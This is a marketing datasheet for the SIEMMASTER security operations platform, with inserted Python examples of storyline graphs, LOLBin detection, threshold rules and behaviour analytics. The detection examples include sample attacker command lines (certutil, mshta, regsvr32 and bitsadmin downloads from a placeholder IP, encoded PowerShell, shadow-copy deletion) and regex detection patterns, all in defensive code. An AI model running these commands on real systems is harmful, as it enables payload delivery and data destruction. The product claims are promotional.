SOAR Solution

Enterprise SOC Platform – Complete Capabilities Datasheet | SIEMMASTER
Enterprise Security Operations Platform

Complete SOC & SOAR Solution

Unified Security Operations Center with AI-powered threat detection, visual playbook automation, comprehensive endpoint protection, and enterprise compliance. CrowdStrike & SentinelOne-level capabilities.

  • 200+ MITRE ATT&CK techniques
  • 40+ SOAR actions
  • 30+ integrations
  • 8K+ IOCs in the threat-intelligence database

Dashboard widget: Critical Alerts 12; Endpoints 2,847; Incidents Today 47; Auto-Remediated 89%
Enterprise Dashboard

Executive Security Overview

Real-time security posture with KPIs, trends, and actionable insights for C-level executives.

Security Posture Dashboard

Comprehensive view of organization security health

Counters: 12 Critical Alerts; 28 High Severity; 67 Medium; 142 Low; 2,847 Protected Endpoints; 94% Compliance Score

Dashboard Cards & Widgets

Security Score Ring
Visual gauge showing overall security posture (0-100) with color-coded severity zones.
  • Real-time score calculation
  • Historical trend line
  • Benchmark comparison
Threat Timeline
24-hour rolling timeline of detected threats with severity breakdown.
  • Hourly event distribution
  • Peak hour identification
  • Trend indicators
Asset Health
Endpoint status overview showing online, offline, and at-risk systems.
  • Agent status monitoring
  • Update compliance
  • Policy adherence
Top Risks
Priority-ranked list of current security risks requiring immediate attention.
  • Risk scoring algorithm
  • One-click investigation
  • Remediation shortcuts
SOAR Platform

Security Orchestration, Automation & Response

Visual playbook builder with 40+ automated response actions and enterprise approval workflows.

SOAR Dashboard

Complete incident management and automated response

Counters: 23 Open Incidents; 12 Active Playbooks; 5 Pending Approvals; 89% Automation Rate; 156 Executions Today; 4.2m Avg MTTR
Tabs: Overview, Incidents, Playbook Builder, Executions, Approvals, Attack Storyline

Incident Management Tab

Incident Queue
Filterable list by category, status, severity, assignee. Bulk select with multi-action support.
Bulk Actions
Update status, assign analyst, run playbook, change severity on multiple incidents at once.
Smart Filters
Filter by: Open/In Progress/Resolved, Critical/High/Medium/Low, Category, Date Range, Assignee.

Visual Playbook Builder (Cytoscape.js)

Drag-and-drop canvas with 25+ node types for building automated response workflows.

Trigger Nodes
  • Alert Trigger, Schedule Trigger, Manual Trigger
Response Actions
  • Isolate Host, Block IP, Kill Process, Quarantine File, Disable User, Lock Screen, Force Reboot
PrahiXEDR Actions (14 actions; 12 listed)
  • Block IP (Firewall), Disable Service, Disable USB, Force Logout, Memory Dump, Collect Event Logs, Registry Delete, Shred File, YARA Scan, Get Autoruns, Kill Process Tree, Uninstall Software
Enrichment Actions
  • IOC Lookup, VirusTotal Scan, WHOIS Lookup, Collect Artifacts
Logic & Control Nodes
  • Condition (If/Else), Loop, Delay/Wait, Parallel Execution
Notification & Approval
  • Slack, Teams, Email, Jira Ticket, Request Approval

Playbook Builder Features

Version Control
  • Full version history
  • Compare versions side-by-side
  • Rollback to any version
  • Change annotations
Test Execution
  • Dry-run mode
  • Visual execution trace
  • Step-by-step debugging
  • Variable inspection
Approval Workflows
  • Multi-level approvals
  • Approval timeouts
  • Slack/Teams notifications
  • Audit trail

Attack Storyline (Neo4j Graph)

Graph database visualization of attack chains showing process-file-network relationships.

Process Nodes
Name, PID, command line, path, parent PID with SPAWNED relationships.
File Nodes
File access/modification events with ACCESSED, WROTE, DELETED relationships.
Network Nodes
Connection events with CONNECTED_TO relationships showing C2 communication.
Registry Nodes
Registry modification events with MODIFIED relationships for persistence tracking.
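As an added example (not SIEMMASTER code), the Python below rebuilds the same kind of storyline from flat endpoint telemetry without a graph database: it indexes SPAWNED/WROTE/MODIFIED/CONNECTED_TO edges, walks back from a C2 connection node to the root process, and lists every file, registry and network artifact the chain touched. The node naming scheme (`proc:<pid>:<image>`, `file:<path>`, `reg:<key>`, `net:<ip>:<port>`), the single-causal-parent assumption and the sample telemetry are constructed for this example.

```python
from collections import defaultdict

# Constructed sample telemetry (not platform output): a macro document that
# spawns PowerShell, which drops a binary, sets a Run key and calls out to C2.
# Each triple is (source node, relationship, destination node).
EVENTS = [
    ("proc:1200:explorer.exe", "SPAWNED", "proc:3344:WINWORD.EXE"),
    ("proc:3344:WINWORD.EXE", "ACCESSED", "file:C:\\Users\\a\\Downloads\\invoice.docm"),
    ("proc:3344:WINWORD.EXE", "SPAWNED", "proc:4120:powershell.exe"),
    ("proc:4120:powershell.exe", "WROTE", "file:C:\\Users\\a\\AppData\\Roaming\\upd.exe"),
    ("proc:4120:powershell.exe", "MODIFIED",
     "reg:HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\upd"),
    ("proc:4120:powershell.exe", "CONNECTED_TO", "net:203.0.113.10:443"),
    ("proc:1200:explorer.exe", "SPAWNED", "proc:5001:chrome.exe"),  # unrelated activity
    ("proc:5001:chrome.exe", "CONNECTED_TO", "net:198.51.100.7:443"),
]

# Relationships that tell us which process "caused" a node to exist.
CAUSAL = {"SPAWNED", "WROTE", "MODIFIED", "DELETED", "CONNECTED_TO"}


def build_graph(events):
    """Forward (src -> [(rel, dst)]) and reverse (dst -> [(rel, src)]) indexes."""
    out, inc = defaultdict(list), defaultdict(list)
    for src, rel, dst in events:
        out[src].append((rel, dst))
        inc[dst].append((rel, src))
    return out, inc


def storyline(events, target):
    """Walk back from `target` (e.g. the C2 network node) through causal
    edges to the root process; return the chain oldest-first."""
    _, inc = build_graph(events)
    chain, node = [], target
    while True:
        parents = [(rel, src) for rel, src in inc.get(node, []) if rel in CAUSAL]
        if not parents:
            break
        rel, parent = parents[0]   # assumption: one causal parent per node
        chain.append((parent, rel, node))
        node = parent
    chain.reverse()
    return chain


def artifacts(events, chain):
    """Every non-process side effect (files, registry, network) of the
    processes in `chain`, so the analyst sees persistence and drops too."""
    out, _ = build_graph(events)
    procs = {n for src, _, dst in chain for n in (src, dst) if n.startswith("proc:")}
    return sorted((p, rel, dst) for p in procs for rel, dst in out[p]
                  if not dst.startswith("proc:"))


if __name__ == "__main__":
    chain = storyline(EVENTS, "net:203.0.113.10:443")
    for src, rel, dst in chain:
        print(f"{src} -[{rel}]-> {dst}")
    print("artifacts:", artifacts(EVENTS, chain))
```

Walking the reverse index is what a graph database does for you with a variable-length path query; the point of keeping the artifact list separate is that persistence (the Run key) and the dropped file are side branches of the chain, not nodes on the path to the C2 connection, and a storyline that only shows the path would miss them.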
Security Alerts

Alert Management Console

Centralized alert management with filtering, categorization, and MITRE ATT&CK mapping.

Security Alerts Dashboard

Real-time threat notifications and alert management

Counters: 12 Critical; 28 High; 67 Medium; 142 Low; 249 Total (24h)
Category tabs: All Alerts, Security, Network, Infrastructure, Wireless, Application

Alert Filters

Filters: Severity; Status (New/Acknowledged/Resolved); Category; Time Range; Search; Source Device

Alert Item Details

Field          Description
Title          Alert name/description
Source         Originating device/system
Timestamp      Detection time with timezone
Severity       Critical, High, Medium or Low
MITRE Mapping  ATT&CK technique ID (e.g., T1059.001)
Actions        Acknowledge, Investigate, Assign, Create Playbook, Dismiss
SOC v2 Dashboard

Advanced Threat Analytics

MITRE ATT&CK matrix visualization, kill chain tracking, and threat intelligence.

SOC v2.0 – Advanced Threat Analytics

Real-time MITRE ATT&CK coverage and kill chain visualization

Counters: 47 Active Threats; 14 Tactics Covered; 207 Techniques; 89% Detection Coverage

MITRE ATT&CK Tactics (14 Tactics)

Technique counts by tactic:
  • Reconnaissance: 10
  • Resource Development: 8
  • Initial Access: 15
  • Execution: 22
  • Persistence: 19
  • Privilege Escalation: 13
  • Defense Evasion: 28
  • Credential Access: 17
  • Discovery: 21
  • Lateral Movement: 9
  • Collection: 12
  • Command and Control: 18
  • Exfiltration: 11
  • Impact: 14

Cyber Kill Chain Visualization

Counts per stage: Reconnaissance 3; Weaponization 2; Delivery 8; Exploitation 12; Installation 5; Command & Control 4; Actions on Objectives 1

Incident Timeline

Chronological view of security events with severity-coded timeline markers.

Critical Events
Red timeline markers with pulsing animation for immediate attention.
Warning Events
Amber markers for high/medium severity requiring review.
Info Events
Blue markers for informational and low severity events.
EDR Dashboard

Endpoint Detection & Response

Real-time endpoint protection with behavioral analysis, memory scanning, and LOLBin detection.

EDR Dashboard – Live Monitoring

Endpoint Detection & Response with prevention mode

Counters: 5 Critical; 12 High Severity; 847 Total Events (24h); 23 Memory Threats; 45 LOLBin Activity; 156 Endpoints

Prevention Mode Banner

Detection/Prevention Toggle: Switch between detect-only mode and active prevention. Shows “Blocked Today” counter.

Memory Threats Panel

Counters: 8 Injections; 5 Shellcode; 3 Hollowing; 7 RWX Regions

“Scan Fleet” button for memory scanning across all endpoints.

LOLBin Activity Grid

Counts per binary: certutil 12; mshta 8; regsvr32 5; rundll32 7; wmic 4; bitsadmin 3; cscript 2; powershell 4
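The grid above counts LOLBin executions per binary. As an added example (not the platform's detection logic), the Python below shows the classification behind such a grid: a process-creation event is attributed to a LOLBin only when its command line matches a pattern associated with abuse, so routine use (certutil hashing a file) is not counted. The pattern set, the event schema and the sample events are constructed for this example; the command lines use well-known abuse forms (certutil -urlcache, mshta with a URL, regsvr32 /i: with scrobj.dll) but are not from the page.

```python
import re
from collections import Counter

# Constructed process-creation events (not platform telemetry). One event
# per binary launch, attributed to the image that was executed.
PROCESS_EVENTS = [
    {"host": "ws01", "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/a.txt a.txt"},
    {"host": "ws01", "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -hashfile setup.msi SHA256"},  # routine use, not counted
    {"host": "ws02", "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta.exe http://203.0.113.10/p.hta"},
    {"host": "ws02", "image": "C:\\Windows\\System32\\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://203.0.113.10/x.sct scrobj.dll"},
    {"host": "ws03", "image": "C:\\Windows\\System32\\rundll32.exe",
     "cmdline": "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\";alert(1)"},
    {"host": "ws03", "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "cmdline": "wmic process call create \"powershell -nop -enc SQBFAFgA\""},
    {"host": "ws03", "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download /priority high "
                "http://203.0.113.10/b.exe C:\\Users\\Public\\b.exe"},
    {"host": "ws04", "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe report.txt"},  # not a LOLBin at all
]

# Regexes that separate abuse from routine use of each binary (assumed set).
LOLBIN_RULES = {
    "certutil":   [r"-urlcache", r"-decode\b", r"-encode\b"],
    "mshta":      [r"https?://", r"vbscript:", r"javascript:"],
    "regsvr32":   [r"/i:https?://", r"scrobj\.dll"],
    "rundll32":   [r"javascript:", r"https?://"],
    "wmic":       [r"process\s+call\s+create", r"/node:"],
    "bitsadmin":  [r"/transfer\b", r"/download\b"],
    "cscript":    [r"https?://", r"//e:jscript"],
    "powershell": [r"-enc(odedcommand)?\s", r"downloadstring", r"\biex\b", r"-nop\b"],
}


def classify(event):
    """Return (lolbin name, matched patterns), or None when the image is not
    a LOLBin or its command line matches no abuse pattern."""
    name = event["image"].rsplit("\\", 1)[-1].lower().removesuffix(".exe")
    patterns = LOLBIN_RULES.get(name)
    if not patterns:
        return None
    hits = [p for p in patterns if re.search(p, event["cmdline"], re.IGNORECASE)]
    return (name, hits) if hits else None


def lolbin_activity(events):
    """Build the per-binary count grid plus the detection list behind it."""
    grid, detections = Counter(), []
    for ev in events:
        result = classify(ev)
        if result is None:
            continue
        name, hits = result
        grid[name] += 1
        detections.append({"host": ev["host"], "lolbin": name,
                           "matched": hits, "cmdline": ev["cmdline"]})
    return grid, detections


if __name__ == "__main__":
    grid, detections = lolbin_activity(PROCESS_EVENTS)
    for name, count in grid.most_common():
        print(f"{name:<10} {count}")
```

Attribution is by the launched image, so the encoded PowerShell inside the wmic event counts as wmic here; the powershell child would arrive as its own process-creation event and be scored separately.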

EDR Dashboard Panels

Recent Detections
Scrollable list of detection events with severity filter.
  • Severity filtering (Critical/High/Medium/Low)
  • One-click investigation
  • MITRE technique tags
Top Affected Hosts
Ranked list of endpoints with most detections.
  • Hostname & detection count
  • Click to view host details
  • Quick isolate option
MITRE Techniques Panel
Top detected MITRE ATT&CK techniques.
  • T1059.001 – PowerShell
  • T1003.001 – LSASS Memory
  • T1547.001 – Registry Run Keys
Recent IOCs
Indicators of Compromise extracted from events.
  • IP addresses
  • File hashes (MD5/SHA256)
  • Domains/URLs
Quick Actions
One-click response actions.
  • Isolate All (affected hosts)
  • Full Fleet Scan
  • Export IOCs
  • Link to SOAR
Threat Hunt Builder
Query interface for proactive threat hunting.
  • KQL-style queries
  • Save & schedule hunts
  • Export results
Threat Intelligence

Threat Intelligence Platform

IOC database with 8,000+ indicators, YARA rules, and behavioral detection.

Threat Intelligence Dashboard

IOC matching, YARA rules, and behavioral detection

Counters: 34 Active Threats; 127 YARA Matches; 892 Malicious Hashes; 1,247 Bad IPs Blocked; 45 DGA Detected

Dashboard Actions

VirusTotal Lookup Import IOCs YARA Editor IOC Lookup

Active YARA Rules

Rule Name                    Severity
Mimikatz_Strings             Critical
CobaltStrike_Beacon          Critical
PowerShell_Download_Execute  High
Ransomware_Indicators        Critical
Webshell_Indicators          Critical
Persistence_Registry         High

IOC Database (8,000+ IOCs)

Breakdown: 3,245 IP Addresses; 2,891 Domains; 1,567 File Hashes; 412 URLs

Behavioral Detection Rules

Credential_Dumping – Process accessing LSASS memory. Threshold: 1 event. Severity: Critical
Lateral_Movement_PSExec – PsExec-style lateral movement. Threshold: 1 event. Severity: High
Mass_File_Encryption – Rapid file modifications (ransomware). Threshold: 50 files / 1 min. Severity: Critical
Brute_Force_Login – Multiple failed login attempts. Threshold: 10 failures / 5 min. Severity: High
Shadow_Copy_Deletion – VSS deletion (ransomware indicator). Threshold: 1 event. Severity: Critical
Scheduled_Task_Persistence – Suspicious scheduled task creation. Threshold: 1 event. Severity: High
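The rules above are count-over-window thresholds. As an added example (not SIEMMASTER's engine), the Python below implements four of them as a streaming sliding-window evaluator keyed by host or user, fires once per burst rather than once per extra event, and runs over constructed events: a 12-failure logon burst, a benign trickle of 3 failures, 60 file modifications in 30 seconds, one LSASS access and one vssadmin shadow deletion. The event schema, the choice of entity key per rule and the sample events are assumptions for this example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Rule set mirroring the dashboard thresholds. `entity` picks the field the
# window is keyed on (assumption: brute force per user, the rest per host).
RULES = [
    {"name": "Credential_Dumping", "severity": "Critical", "threshold": 1, "window_s": 0,
     "entity": "host",
     "match": lambda e: e["type"] == "process_access" and e.get("target", "").lower() == "lsass.exe"},
    {"name": "Mass_File_Encryption", "severity": "Critical", "threshold": 50, "window_s": 60,
     "entity": "host",
     "match": lambda e: e["type"] == "file_modify"},
    {"name": "Brute_Force_Login", "severity": "High", "threshold": 10, "window_s": 300,
     "entity": "user",
     "match": lambda e: e["type"] == "logon_failed"},
    {"name": "Shadow_Copy_Deletion", "severity": "Critical", "threshold": 1, "window_s": 0,
     "entity": "host",
     "match": lambda e: e["type"] == "process_create"
                        and "delete shadows" in e.get("cmdline", "").lower()},
]


def evaluate(events):
    """Stream events through every rule; raise one alert per entity each
    time `threshold` matching events fall within `window_s` seconds."""
    windows = defaultdict(deque)   # (rule, entity) -> timestamps still in window
    alerts = []
    for ev in sorted(events, key=lambda e: datetime.fromisoformat(e["ts"])):
        ts = datetime.fromisoformat(ev["ts"])
        for rule in RULES:
            if not rule["match"](ev):
                continue
            q = windows[(rule["name"], ev[rule["entity"]])]
            q.append(ts)
            while (ts - q[0]).total_seconds() > rule["window_s"]:
                q.popleft()        # evict matches that aged out of the window
            if len(q) >= rule["threshold"]:
                alerts.append({"rule": rule["name"], "severity": rule["severity"],
                               "entity": ev[rule["entity"]], "count": len(q), "at": ev["ts"]})
                q.clear()          # one burst -> one alert, not one per extra event
    return alerts


# Constructed sample events (not platform telemetry).
T0 = datetime(2024, 1, 15, 9, 0, 0)

def _at(seconds):
    return (T0 + timedelta(seconds=seconds)).isoformat()

EVENTS = (
    [{"ts": _at(i * 20), "type": "logon_failed", "user": "svc_backup", "host": "dc01"}
     for i in range(12)]                                   # 12 failures in 220 s -> fires
    + [{"ts": _at(i * 120), "type": "logon_failed", "user": "alice", "host": "ws01"}
       for i in range(3)]                                  # 3 failures in 240 s -> quiet
    + [{"ts": _at(600 + i * 0.5), "type": "file_modify", "user": "bob", "host": "ws02",
        "path": f"D:\\docs\\{i}.xlsx.locked"} for i in range(60)]   # 60 writes in 30 s -> fires
    + [{"ts": _at(700), "type": "process_access", "user": "bob", "host": "ws03",
        "target": "lsass.exe"}]
    + [{"ts": _at(800), "type": "process_create", "user": "bob", "host": "ws02",
        "cmdline": "vssadmin.exe delete shadows /all /quiet"}]
)

if __name__ == "__main__":
    for alert in evaluate(EVENTS):
        print(alert)
```

Clearing the window after an alert is the design choice worth noting: without it, the brute-force rule would emit an alert on the 10th, 11th and 12th failure of the same burst, which is exactly the duplicate noise an automation rate figure hides.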

STIX/TAXII Feed Integration

Feed Name             IOC Count     Status
AlienVault OTX        15,234 IOCs   Synced
Abuse.ch URLhaus      8,547 URLs    Synced
MISP Default          45,891 IOCs   Synced
Custom TAXII Server   2,341 IOCs    Pending
UEBA Dashboard

User & Entity Behavior Analytics

ML-powered anomaly detection, insider threat detection, and impossible travel alerts.

UEBA – Behavior Analytics

Detect anomalous user behavior, insider threats, and compromised accounts

Counters: 12 Active Users; 8 ML Anomalies; 23 Failed Logins; 2 Impossible Travel; 3 Privilege Escalation; Insider Threat Score: Low

ML Anomaly Detection

94% Model Accuracy; 1.2M Events Analyzed; 0.3% False Positive Rate

Running ML Models:

  • Login Pattern Analysis
  • Resource Access Profiling
  • Behavior Deviation Scoring

Impossible Travel Alerts

admin_default – Mumbai → New York in 30 min – Critical
AmitK – Delhi → Singapore in 2 hours – Review
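As an added example (not SIEMMASTER's UEBA code), the Python below shows the core of an impossible-travel check: geolocate consecutive logins per user, compute the great-circle distance with the haversine formula, divide by the elapsed time and tier the result by implied speed. The speed tiers (Critical above 1,000 km/h, Review between 500 and 1,000 km/h), the city coordinates standing in for geo-IP output, and the sample logins are assumptions for this example; under these tiers both page examples come out Critical, and a Mumbai → Delhi hop in 90 minutes is what lands in Review.

```python
from collections import defaultdict
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Constructed geo-IP output for the sample logins (lat, lon in degrees).
CITIES = {
    "Mumbai": (19.0760, 72.8777), "New York": (40.7128, -74.0060),
    "Delhi": (28.6139, 77.2090), "Singapore": (1.3521, 103.8198),
}

# Assumed tiers: above ~1000 km/h nothing a person boards explains the hop
# (Critical); 500..1000 km/h is achievable only by a direct flight with no
# airport overhead, so it goes to an analyst (Review).
CRITICAL_KMH = 1000
REVIEW_KMH = 500


def haversine_km(a, b):
    """Great-circle distance between two (lat, lon) points in kilometres."""
    lat1, lon1, lat2, lon2 = map(radians, (*a, *b))
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(h))


def impossible_travel(logins):
    """Compare each user's consecutive logins from different cities and
    classify by the speed the user would have needed."""
    by_user = defaultdict(list)
    for login in logins:
        by_user[login["user"]].append(login)
    alerts = []
    for user, seq in by_user.items():
        seq.sort(key=lambda l: l["ts"])
        for prev, cur in zip(seq, seq[1:]):
            if prev["city"] == cur["city"]:
                continue
            km = haversine_km(CITIES[prev["city"]], CITIES[cur["city"]])
            hours = (cur["ts"] - prev["ts"]).total_seconds() / 3600
            kmh = km / hours if hours > 0 else float("inf")
            if kmh > CRITICAL_KMH:
                verdict = "Critical"
            elif kmh > REVIEW_KMH:
                verdict = "Review"
            else:
                continue
            alerts.append({"user": user, "from": prev["city"], "to": cur["city"],
                           "km": round(km), "hours": round(hours, 2),
                           "kmh": round(kmh), "verdict": verdict})
    return alerts


# Constructed logins (not platform data).
LOGINS = [
    {"user": "admin_default", "city": "Mumbai",    "ts": datetime(2024, 1, 15, 9, 0)},
    {"user": "admin_default", "city": "New York",  "ts": datetime(2024, 1, 15, 9, 30)},
    {"user": "AmitK",         "city": "Delhi",     "ts": datetime(2024, 1, 15, 8, 0)},
    {"user": "AmitK",         "city": "Singapore", "ts": datetime(2024, 1, 15, 10, 0)},
    {"user": "priya",         "city": "Mumbai",    "ts": datetime(2024, 1, 15, 6, 0)},
    {"user": "priya",         "city": "Delhi",     "ts": datetime(2024, 1, 15, 7, 30)},  # fast but possible
    {"user": "ravi",          "city": "Delhi",     "ts": datetime(2024, 1, 15, 6, 0)},
    {"user": "ravi",          "city": "Mumbai",    "ts": datetime(2024, 1, 15, 9, 0)},   # ordinary flight
]

if __name__ == "__main__":
    for alert in impossible_travel(LOGINS):
        print(alert)
```

In production the two caveats are geo-IP accuracy (VPN egress and mobile carrier NAT place users hundreds of kilometres from where they sit) and same-city pairs, which this check skips rather than scores, so a VPN flip between two providers in one city produces no alert.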

Peer Group Analysis

Administrators (3 users)
Avg Daily Logins: 4.2
Avg Privilege Uses: 12.5
Deviation Threshold: 2.5σ
Developers (8 users)
Avg Daily Logins: 2.1
Avg File Access: 45.3
Deviation Threshold: 3.0σ
Support Staff (5 users)
Avg Daily Logins: 1.5
Avg Ticket Access: 23.7
Deviation Threshold: 2.0σ
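As an added example (not SIEMMASTER's model), the Python below shows what a σ-based peer-group deviation threshold means in practice: each group's recent history is pooled into one distribution, a user's value for today is converted into a z-score against the pooled mean and sample standard deviation, and the user is flagged when |z| exceeds the group's threshold. The group membership, the ten-day baselines and today's counts are constructed for this example; the thresholds are the ones shown above.

```python
from statistics import mean, stdev

# Peer groups with the deviation thresholds shown on the dashboard.
PEER_GROUPS = {
    "Administrators": {"sigma": 2.5, "users": ["root_adm", "jsmith_adm", "ops_adm"]},
    "Developers":     {"sigma": 3.0, "users": ["dev_a", "dev_b", "dev_c"]},
}

# Constructed history: daily login counts for the previous 10 days per user.
BASELINE = {
    "root_adm":   [4, 5, 4, 3, 5, 4, 4, 5, 3, 4],
    "jsmith_adm": [4, 4, 5, 4, 3, 5, 4, 4, 4, 5],
    "ops_adm":    [3, 4, 4, 5, 4, 4, 3, 4, 5, 4],
    "dev_a":      [2, 2, 1, 3, 2, 2, 2, 1, 3, 2],
    "dev_b":      [2, 3, 2, 2, 1, 2, 3, 2, 2, 2],
    "dev_c":      [1, 2, 2, 2, 3, 2, 2, 2, 1, 2],
}
# Constructed observation for today.
TODAY = {"root_adm": 4, "jsmith_adm": 11, "ops_adm": 5, "dev_a": 2, "dev_b": 6, "dev_c": 2}


def group_profile(users, baseline):
    """Pool every peer's history into one distribution: (mean, sample stdev)."""
    pooled = [v for u in users for v in baseline[u]]
    return mean(pooled), stdev(pooled)


def z_score(value, mu, sigma):
    """Standard score; a flat baseline (sigma 0) makes any change infinite."""
    if sigma == 0:
        return 0.0 if value == mu else float("inf")
    return (value - mu) / sigma


def peer_group_anomalies(groups=PEER_GROUPS, baseline=BASELINE, today=TODAY):
    """Flag users whose count for today deviates from their peer group by
    more than the group's sigma threshold (two-sided: drops can matter too)."""
    anomalies = []
    for name, cfg in groups.items():
        mu, sd = group_profile(cfg["users"], baseline)
        for user in cfg["users"]:
            z = z_score(today[user], mu, sd)
            if abs(z) > cfg["sigma"]:
                anomalies.append({"user": user, "group": name, "metric": "daily_logins",
                                  "value": today[user], "peer_mean": round(mu, 2),
                                  "z": round(z, 2), "threshold": cfg["sigma"]})
    return anomalies


if __name__ == "__main__":
    for anomaly in peer_group_anomalies():
        print(anomaly)
```

Pooling peers rather than scoring each user against only their own history is what makes this a peer-group check: a new administrator with three days of history still gets a usable baseline, and an insider whose own history is already abnormal does not get to define "normal" for themselves. A small group with a very tight baseline produces a small σ, so a modest absolute change can exceed 2.5σ; that is why the support group on the page carries a lower threshold than developers, whose activity is noisier.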
Compliance & Vulnerability

Enterprise Compliance & Vulnerability Management

Endpoint compliance, USB control, DLP, and CVE vulnerability scanning.

Compliance Dashboard

Endpoint compliance status & DLP

94% Compliance Score; 1/1 Endpoints Compliant

Quick Status Cards

Antivirus: Enabled
Firewall: All Profiles
BitLocker: Disabled
Updates: Current
TPM: v2.0
Screen Lock: 15 min

USB Device Control

Device                  Type      Status
SanDisk Ultra USB       Storage   Monitored
Logitech USB Receiver   HID       Allowed

Blacklisted Software

BitTorrent, Tor Browser, AnyDesk (Detected), TeamViewer

Vulnerability Dashboard

CVE detection & software scanning

Counters: 2 Critical CVEs; 3 High CVEs; 2 Medium; 65 Apps Scanned

Top Vulnerabilities

CVE               Software        CVSS
CVE-2023-38831    WinRAR          8.6
CVE-2024-31497    PuTTY           8.1
CVE-2024-0001     Chrome          8.8
CVE-2023-44336    Adobe Acrobat   7.8

Click “Run Scan” to detect new vulnerabilities.

Compliance Frameworks

Supported Regulatory Frameworks

Pre-built compliance frameworks with automated assessment and gap analysis.

CIS Controls v8
18 Critical Security Controls
NIST CSF
Cybersecurity Framework
PCI-DSS
Payment Card Industry
HIPAA
Healthcare Compliance
SOC 2
Trust Services Criteria
ISO 27001
Information Security
Integrations

30+ Security Integrations

Connect with your existing security stack for unified visibility.

FortiGate
Palo Alto
CrowdStrike
SentinelOne
Sophos
Elasticsearch
Slack
Teams
Jira
Email/SMTP
Active Directory
AWS/Azure
VirusTotal
AlienVault OTX
Cisco
Check Point
Splunk
Zabbix

Ready to Transform Your Security Operations?

Schedule a demo to see how our platform can protect your enterprise.